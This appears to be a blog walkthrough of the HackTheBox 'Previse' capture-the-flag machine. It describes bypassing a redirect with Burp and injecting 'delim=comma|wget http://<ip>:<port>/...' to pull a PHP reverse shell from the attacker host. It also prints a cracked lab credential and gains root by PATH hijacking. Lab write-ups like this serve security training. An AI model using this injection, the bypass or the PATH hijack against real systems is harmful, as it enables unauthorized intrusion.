In this post, I would like to share a walkthrough of the Previse Machine from HackTheBox


This room has been considered difficulty rated as an Easy machine on HackThebox

What will you gain from Previse machine?


For user flag, you will get a file from the website and get a shell using burpsite


As for the root flag, you need to execute some Path Injection to get a root reverse shell

Information Gathering


Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 


Let’s try to open the website


We have been redirected to a Previse File Storage login page where I cannot find any useful information to be used from here.


Let’s run gobuster to enumerate any interesting directory that has been using PHP file format.


The command to use here can be something such as

gobuster dir -u http://<machine’s ip> -w /usr/share/wordlists/dirb/common.txt -x php


We managed to get a few interesting files such as config.php on the gobuster result.


Oh, wait! We also managed to get status 403 and 302 on certain directories from the result.


For more information on those status codes, we need to do some research on the internet and managed to find the information over here


Next, we should be opening BurpSuite Tools to inspect the web packet.


Once we have Burpsuite started, we need to go to Proxy > Options where we need to add a match/replace rule. We need to redirect a 302 Found status code to replace it with a 200 OK status code


Let’s try to access the accounts.php directory with the support from BurpSuite

Gaining the Privileges Access


The website has been loading for a while now, so let’s see on the BurpSuite


On the intercept section, I notice that we have a website packet that needed to be forwarded to the website.


After we have forwarded the packet, we managed to get a page that requires the creation of a new account.


A new user was added to the system database where we should be able to see the Dashboard


From the screenshot above, we should try to roam within the website in case obtaining useful details


On the files section, there’s a file called SITEBACKUP.ZIP where we should be able to download the file into our machine.


We need to unzip the file where we can see a bunch of PHP files such as shown in the screenshot above. We should read all files, but one file has caught my eye such as config.php


There’s a configuration on MySQL connection but sadly, we cannot use the credentials right now. However, we should save the user and password from config.php which might be useful in the future.


The only problem that we faced right now is how can we get a reverse shell on the machine itself.


While looking within other files, we stumbled on an interesting file (logs.php) where we can see {$_POST[‘delim’]} function inside the file.


We also notice that there’s a log data section under the Management Menu column on the website


The page should look something like above where we should be getting a file after clicking the Submit button


When I opened the file, I notice there were a lot of lines within the file. We might find the username that can be logged into the machine

BurpSuite Intercept


Let’s analyze the flow by using BurpSuite where we should be able to notice that a Request body that shows delim=comma


We should modify the php-reverse-shell.php with my own IP and choose PORT


A few things that we should be running from our attacker’s machine such as the python server and netstat/nc


After those have been started, we should be able to get a reverse shell by using BurpSuite


On the BurpSuite request, we can add a separate command which retrieves our php-reverse-shell.php by using delim=comma|wget http://<ip>:<port>/php-reverse-shell.php


Sadly, we got a 302 Found on the Request Header which shouldn’t be happening to us.

How to solve these issues?


After a while, we should retry the website by logging back to the website


Aside from that, I have renamed the php-reverse-shell to shell.php just in case


Once we have fully modified it, we should try to get a reverse shell again.


It is looking surprisingly good so far and let’s continue to the next step.

For us to get a reverse shell, we need to execute the shell on the Browser

Boom! We got a reverse shell on our attacker’s machine.

MySQL enumeration on previse machine


Let’s enumerate the database by using the credentials that we found earlier. Sadly, we got a MySQL syntax error from that command.


My bad! I have run the wrong command previously and I am just running the correct command right now. Surprisingly, it works like charm!


We also can read the username and password that have been stored inside MySQL (my username is there too)


For us to get the password, we need to crack the hash that we found in MySQL


For that purpose, we can use hashcat tool which it can provide you with the password


As a result, we have the credentials as shown below:

  • username: m4lwhere
  • password: ilovecody112235!

Maintaining Privileges Access on Previse Machine


We can access the machine via SSH service by using the credentials that we found previously.


We can read the user flag by executing the command “cat user.txt

Escalate to Root Privileges Access on Previse machine


For us to get escalation to root, we need to find the SUID file that we can use to abuse.


By typing the command “sudo -l” and we managed to be aware of /opt/scripts/access_backup.sh


While reading the file access_backup.sh, we know that we can run some commands from anywhere inside the machine.


I have created a gzip file that contains a reverse shell command (bash command) under /dev/shm directory


We need to give permission to execute the gzip file


We should be exporting the PATH into the mentioned command above.


Next, we should be running the SUID file using sudo permission, but we need to start our listener before executing it.


Voila! We get a shell back to us as Root Access and we can read the root flag by using the command “cat /root/root.txt